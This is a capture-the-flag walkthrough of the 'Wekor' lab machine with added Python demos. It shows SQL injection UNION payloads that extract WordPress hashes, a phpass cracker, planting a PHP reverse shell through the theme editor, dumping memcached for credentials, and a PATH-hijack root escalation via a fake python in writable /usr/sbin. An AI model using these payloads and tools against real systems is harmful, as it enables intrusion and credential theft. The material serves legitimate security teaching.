Wekor

ad8373f374f4983a7940db9b86efeb85.png

Target IP: 10.10.56.145
Challenge Description:
c3021512a5bf2fb23a140aa0601c9408.png


Reconnaissance

0cde819207e796fd14b62feaaff149f2.png
Performing a port scan shows there are two TCP ports open on the target machine: SSH and HTTP, as shown above.

2b61e763aca191827d2dad785481b66d.png
Doing an aggressive port scan against the two open TCP ports returns the result above. The scan also reveals a robots.txt with interesting entries. I will start enumeration with the HTTP application on port 80.

119a8274fc71b9a8aa055a9d75fed5cd.png
I performed a VHOST scan using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.wekor.thm" -u http://wekor.thm -fs 23 (the -fs 23 filters out the default response, which is 23 bytes long) and found an interesting subdomain called site.

8e45d8ef2579f5b80686c29c383ef00e.png
I added the entry shown above for this machine to my /etc/hosts file.


Enumeration

Port 80: HTTP (wekor.thm)
41848faf46d860a6d608d228a24eb45b.png
The webpage above is displayed for this web application.

ef79dbe9bdbfcec93b8e95b91e89fa3e.png
The earlier nmap scan identified a robots.txt file; its entries are shown above.

397a89f95b449d096249c121aeb2b2f4.png
Of the paths listed in robots.txt, only /comingreallysoon is accessible. The webpage above is displayed for this directory, and its message tells me to browse to /it-next.

0ecbdde3961465c9a81bdbd3638ef6ec.png
And browsing to http://wekor.thm/it-next/ displays the website above.

9a701b9e6df7b0cde49d6e1eb5aa5547.png
Browsing to Shop and then Shopping Cart displays the webpage above. There is an input box where users can enter a coupon code. I tested this input box for SQL injection with a single quote (') and got a hit, as shown above: the database error returned by the application means the coupon code is concatenated straight into a SQL query, so the application is vulnerable to SQL injection.

ebf503b9adec8b6ae21f2ec950af6bb7.png
I tested the payload ' OR '1'='1' -- // and received the output above. There is a valid coupon with the code 12345, and by the looks of it the table has three columns. I confirmed the column count with ORDER BY: 12345' ORDER BY 3 -- // succeeds, while anything above three (for example ORDER BY 4) throws the error Unknown column '4' in 'order clause'. With a valid coupon code and a known column count I can now enumerate the database through UNION queries.

4bbe77cd1b6f4d9b17095ba47c84d082.png
Using the payload 12345' UNION SELECT user(), database(), @@version -- //, I obtained more information about the target. The web application connects to MySQL as root@localhost, the current database is coupons, and the MySQL server version is 5.7.32-0ubuntu0.16.04.1.

71288e84dea5d0429e170443b127e4b8.png
Using the payload 12345' UNION SELECT table_name, table_catalog, table_schema from information_schema.tables -- //, I listed the tables in every database. The most interesting one is wp_users inside the wordpress database, as shown above. Does this table contain sensitive information?

dadf85dc655244a8a6d84e9245e76caf.png
I already know the column names WordPress uses in wp_users, so I crafted the payload 12345' UNION SELECT user_email, user_pass, user_login from wordpress.wp_users -- //. Sending it returns the details of the WordPress users, as shown above. I now have the emails, usernames, and password hashes of four different users.
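The coupon-code injection chain above (error probe, tautology, ORDER BY column counting, then UNION extraction) reproduced end to end, as an added example that is not part of the original writeup. It uses an in-memory SQLite database with constructed coupon and wp_users rows as a stand-in for the target's MySQL server, so sqlite_master takes the place of information_schema.tables and the error text differs from MySQL's Unknown column message; the vulnerable and hardened lookup functions are hypothetical and only illustrate how the page's payloads behave against concatenated versus parameterised queries.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in data: a coupons table with three columns (matching the
    ORDER BY 3 result from the writeup) and a wp_users table with dummy hashes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE coupons (code TEXT, discount TEXT, expires TEXT);
        INSERT INTO coupons VALUES ('12345', '10%', '2021-12-31');
        INSERT INTO coupons VALUES ('STAFF50', '50%', '2099-01-01');
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT, user_email TEXT);
        INSERT INTO wp_users VALUES ('wp_yura', '$P$constructed-hash-1', 'yura@example.test');
        INSERT INTO wp_users VALUES ('wp_jim',  '$P$constructed-hash-2', 'jim@example.test');
        """
    )
    return conn


def vulnerable_lookup(conn, coupon):
    """Vulnerable (hypothetical) coupon check: the user-supplied code is
    concatenated into the SQL text, so quotes and comments change the query."""
    query = f"SELECT code, discount, expires FROM coupons WHERE code = '{coupon}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, coupon):
    """Hardened version: a bound parameter is always treated as data."""
    return conn.execute(
        "SELECT code, discount, expires FROM coupons WHERE code = ?", (coupon,)
    ).fetchall()


def injection_error(conn, coupon) -> bool:
    """True when the payload breaks the query syntax (the ' probe from the page)."""
    try:
        vulnerable_lookup(conn, coupon)
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(conn, valid_code, limit=10) -> int:
    """Increase ORDER BY n until the database rejects it; the last accepted n is
    the number of columns the UNION payloads must match."""
    columns = 0
    for n in range(1, limit + 1):
        if injection_error(conn, f"{valid_code}' ORDER BY {n} -- //"):
            break
        columns = n
    return columns


def demo():
    conn = build_db()
    return {
        "probe_errors": injection_error(conn, "'"),
        "all_rows": vulnerable_lookup(conn, "' OR '1'='1' -- //"),
        "columns": count_columns(conn, "12345"),
        # sqlite_master stands in for information_schema.tables
        "tables": vulnerable_lookup(
            conn, "12345' UNION SELECT name, type, tbl_name FROM sqlite_master -- //"
        ),
        "users": vulnerable_lookup(
            conn, "12345' UNION SELECT user_email, user_pass, user_login FROM wp_users -- //"
        ),
        # the same tautology against the parameterised query returns nothing
        "safe": safe_lookup(conn, "' OR '1'='1' -- //"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The `-- //` sequence works in both engines because `--` starts a comment that swallows the application's trailing quote; the column count has to be found first because a UNION whose column count differs from the original SELECT is rejected before any data comes back.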

99dc366f17d355394c3f16fa1b634eae.png
I copied the password hashes of the four users into a file called hash on my machine. Using john, I cracked three of the four hashes, as shown above. Maybe these credentials will become useful later? Time to find where the WordPress application is.
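To show what john is doing with those wp_users hashes, here is the WordPress portable hash (phpass, the $P$ prefix) reimplemented with a dictionary attack, as an added example that is not part of the original writeup. The algorithm is the one shipped in WordPress (salted MD5 iterated 2^cost times, cost 13 by default, encoded with phpass' own base64 alphabet); the salt, wordlist and the password used to build the sample hash are constructed here, and the hash from the page is deliberately not reused.

```python
import hashlib
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' custom base64: 3 bytes -> 4 chars, little-endian, itoa64 alphabet."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> Optional[str]:
    """Recompute a $P$/$H$ hash for `password` under the cost and salt carried in
    `setting` (the first 12 characters of a stored hash)."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        return None
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def make_hash(password: str, salt8: str, count_log2: int = 13) -> str:
    """Build a hash the way WordPress stores it ($P$B... means cost 2^13)."""
    if len(salt8) != 8:
        raise ValueError("phpass salts are exactly 8 characters")
    return phpass_crypt(password, "$P$" + ITOA64[count_log2] + salt8)


def verify(password: str, stored: str) -> bool:
    """Constant-structure check: rehash the guess with the stored salt and compare."""
    return phpass_crypt(password, stored) == stored


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack, the same loop john --format=phpass runs much faster."""
    for guess in candidates:
        if verify(guess, stored):
            return guess
    return None


if __name__ == "__main__":
    # constructed sample: salt and password chosen here, not taken from the target
    sample = make_hash("soccer13", "constsal")
    print(sample, "->", crack(sample, ["password", "123456", "letmein", "soccer13"]))
```

Each guess costs 8193 MD5 calls at the WordPress default, which is why a dedicated cracker matters for anything beyond a short wordlist, and why the one hash john could not crack above was most likely simply absent from the wordlist rather than protected by a stronger scheme.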

Port 80: HTTP (site.wekor.thm)
e9ce00242dae905062f8c7fa5cf17150.png
Browsing to http://site.wekor.thm displays the webpage above. The message says a website will be up in two weeks. The name Jim is interesting as a potential username.

daa3da3c0db6a2ece0108c5c4c4ff297.png
A directory scan shows a /wordpress entry. I am guessing this is the website mentioned at http://site.wekor.thm.

c219e455f71b9929da5638074bb38ba7.png
And browsing to http://site.wekor.thm/wordpress/ displays the Wordpress webpage above.

ce6f468921be9c570042ce1ec482f7cb.png
I browsed to http://site.wekor.thm/wordpress/wp-admin/ to log in, as I already have credentials. All three cracked credentials log in successfully, and of these the user wp_yura with the password soccer13 has administrator privileges, as shown above.


Exploitation

556f9f55177c99de62760d184d161063.png
Since this user has administrator privileges, I used the Theme Editor feature to plant a webshell. I replaced the contents of the 404.php file of the Twenty Seventeen theme with the Pentest Monkey PHP reverse shell, as shown above, and then started a listener on port 8443 on my machine.

726aca93f3bdc4e0f360fd98a5a6fd1f.png
To trigger the reverse shell, I browsed to http://site.wekor.thm/wordpress/wp-content/themes/twentyseventeen/404.php and received a connection on my listener as www-data. Now I have a foothold on the target machine.


Privilege Escalation

bd2ebf45fd4854cf59d82fdc3efce9ab.png
I obtained credentials for the MySQL service, as shown above, and logged in to the instance on port 5072 with the command mysql -u root -P 5072 -p, but I did not find anything useful there.

126e1f221a85a899ecfe70a6b4e75972.png
Running ss -tuln lists the sockets listening on localhost. The service on port 11211 stands out, since 11211 is the default memcached port. A Google search for port 11211 led me to a useful article.

b88a58d6edada9f20e02b13921023e61.png
I used the command echo "version" | nc -vn -w 1 127.0.0.1 11211 from that article to obtain the version number and got the response VERSION 1.4.25 Ubuntu. This confirms the target is running memcached.

a16a0f2dd7beb7746abb56a05fae0385.png
Using the commands from the same article to dump the cached items, I obtained the password OrkAiSC00L24/7$ for the user Orka, as shown above. I then moved laterally from www-data to Orka by switching user with su and the recovered password.
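The memcached enumeration the article walks through over nc, written out as an added example that is not part of the original writeup: version, then stats items to learn the slab IDs, stats cachedump to list the keys in each slab, and get to read each value. The FakeMemcached class is a constructed stand-in that answers the 1.4.x text protocol with dummy keys and values (nothing from the target is reused), so the dump runs offline; tcp_query is the real transport for a live host and is not exercised here. Note that stats cachedump is a debugging command that later memcached releases dropped, so this works against the 1.4.25 build seen on the box but not necessarily against a current server.

```python
import socket


class FakeMemcached:
    """Constructed stand-in for a memcached 1.4.x server: enough of the text
    protocol (version, stats items, stats cachedump, get) to run the dump."""

    def __init__(self, items: dict):
        self.items = items  # key -> value, dummy data only

    def query(self, command: str) -> str:
        parts = command.split()
        if parts == ["version"]:
            return "VERSION 1.4.25 Ubuntu\r\n"
        if parts == ["stats", "items"]:
            # a real server has one slab class per item size; one slab suffices here
            return (f"STAT items:1:number {len(self.items)}\r\n"
                    "STAT items:1:age 120\r\nEND\r\n")
        if parts[:2] == ["stats", "cachedump"]:
            lines = [f"ITEM {k} [{len(v)} b; 0 s]" for k, v in self.items.items()]
            return "\r\n".join(lines + ["END"]) + "\r\n"
        if len(parts) == 2 and parts[0] == "get":
            value = self.items.get(parts[1])
            if value is None:
                return "END\r\n"
            return f"VALUE {parts[1]} 0 {len(value)}\r\n{value}\r\nEND\r\n"
        return "ERROR\r\n"


def parse_slab_ids(stats_items: str) -> list:
    """'STAT items:<slab>:<name> <value>' lines -> sorted unique slab IDs."""
    ids = {int(line.split(":")[1]) for line in stats_items.splitlines()
           if line.startswith("STAT items:")}
    return sorted(ids)


def parse_keys(cachedump: str) -> list:
    """'ITEM <key> [<bytes> b; <expiry> s]' lines -> key names."""
    return [line.split()[1] for line in cachedump.splitlines() if line.startswith("ITEM ")]


def parse_value(get_reply: str):
    """'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\nEND' -> data, or None on a miss."""
    lines = get_reply.split("\r\n")
    if not lines or not lines[0].startswith("VALUE "):
        return None
    return lines[1]


def dump_all(query, limit: int = 100):
    """Run the full enumeration through any `query(command) -> reply` transport."""
    version = query("version").strip()
    found = {}
    for slab in parse_slab_ids(query("stats items")):
        for key in parse_keys(query(f"stats cachedump {slab} {limit}")):
            found[key] = parse_value(query(f"get {key}"))
    return version, found


def tcp_query(host: str, port: int, command: str, timeout: float = 2.0) -> str:
    """Real transport: the same exchange as `echo <command> | nc host port`.
    Reads until the reply terminator; a value containing 'END\\r\\n' would need
    length-based framing instead (kept simple here)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall((command + "\r\n").encode())
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            if buf.endswith(b"END\r\n") or buf.startswith((b"VERSION", b"ERROR")):
                break
    return buf.decode(errors="replace")


if __name__ == "__main__":
    fake = FakeMemcached({"username": "example_user", "password": "example_pass"})
    print(dump_all(fake.query))
    # against the box: dump_all(lambda c: tcp_query("127.0.0.1", 11211, c))
```

Memcached has no authentication in the text protocol, so anything that can reach the port (here, a local shell as www-data) can read every cached object; binding to 127.0.0.1 only helps until an attacker already has local code execution.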

8d1869067155a7a3d5936b2f117707af.png
Running sudo -l shows the interesting entry above. This user also has two interesting files in their Desktop directory: bitcoin and transfer.py. The first is a binary executable, and running strings on it reveals a hardcoded password, which is literally password.

365215185f39da3ff1603f04e002e3f8.png
The script transfer.py contains the code shown above. Its behaviour looks very much like what the bitcoin binary does, which suggests the binary hands off to this script by calling the python interpreter. Maybe I can hijack what it executes?

2029254152472aebb0aca818037a59ef.png
I notice that /usr/sbin is writable by Orka. On a default Ubuntu sudoers, sudo resets PATH to a secure_path in which /usr/sbin is searched before /usr/bin, so a file named python placed there will be found before the real interpreter. This is where I created the malicious fake python, as shown above; it simply executes /bin/bash. Then I made the file executable by changing its permissions.

dc29af2de8046f229ac4000e94ba26fb.png
Running sudo -u root /home/Orka/Desktop/bitcoin then starts the application normally. When the binary calls python, my fake interpreter in /usr/sbin runs instead and drops me into a bash shell with root privileges, as shown above. Now I have root access on the target machine.
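The PATH-hijack that gives root above, generalised into an audit check, as an added example that is not part of the original writeup: resolve() walks a PATH the way execvp() does, writable_shadowing_dirs() lists every directory that is both earlier in the search order than the real binary and writable by the current user (each one is a place to plant a fake python), and demo_hijack() rebuilds the situation in a temporary directory tree so the effect can be observed without touching /usr/sbin. The secure_path constant is the usual Ubuntu default and the planted script is a hypothetical stand-in; neither the target's binary nor its sudoers entry is reproduced.

```python
import os
import tempfile

# Usual Ubuntu sudoers secure_path (constructed here from the default): sbin
# directories precede their bin counterparts, so /usr/sbin/python shadows
# /usr/bin/python for anything root runs through sudo.
UBUNTU_SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve(command: str, path: str):
    """First executable named `command` along `path`, in search order."""
    for directory in path.split(os.pathsep):
        if not directory:
            continue
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def writable_shadowing_dirs(command: str, path: str) -> list:
    """Directories searched before the one that currently supplies `command`
    and writable by us: planting a file named `command` in any of them
    hijacks every caller that relies on PATH lookup."""
    real = resolve(command, path)
    hits = []
    for directory in path.split(os.pathsep):
        if real is not None and os.path.dirname(real) == directory:
            break
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            hits.append(directory)
    return hits


def _write_executable(path: str, body: str) -> None:
    with open(path, "w") as handle:
        handle.write(body)
    os.chmod(path, 0o755)


def demo_hijack(interpreter: str = "python3") -> dict:
    """Recreate the writeup's layout in a temp tree: a writable 'sbin' ahead of a
    'bin' that holds the legitimate interpreter, then plant a fake one."""
    root = tempfile.mkdtemp(prefix="path-hijack-")
    sbin, bin_dir = os.path.join(root, "sbin"), os.path.join(root, "bin")
    os.makedirs(sbin)
    os.makedirs(bin_dir)
    _write_executable(os.path.join(bin_dir, interpreter), "#!/bin/sh\nexit 0\n")
    path = os.pathsep.join([sbin, bin_dir])

    before = resolve(interpreter, path)
    candidates = writable_shadowing_dirs(interpreter, path)
    fake = os.path.join(sbin, interpreter)
    # hypothetical payload, the shape of what the writeup planted; never executed here
    _write_executable(fake, "#!/bin/sh\nexec /bin/bash\n")
    after = resolve(interpreter, path)
    return {
        "before": before,
        "after": after,
        "shadowing_dirs": candidates,
        "hijacked": after == fake,
    }


if __name__ == "__main__":
    print("writable dirs shadowing python on this host:",
          writable_shadowing_dirs("python3", UBUNTU_SECURE_PATH))
    print(demo_hijack())
```

Run against the real secure_path on the box, writable_shadowing_dirs("python", UBUNTU_SECURE_PATH) would have returned ['/usr/sbin'], which is exactly the finding that led to root. The fix on the defending side is the mirror image: the binary should invoke the interpreter by absolute path, and no directory in secure_path should be writable by an unprivileged user.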


Flags

ef1c208f87b08697517974ffaf05ad55.png
The user.txt flag is shown above.

072daf2c64451d8a46bff9be0e655055.png
The root.txt flag is shown above.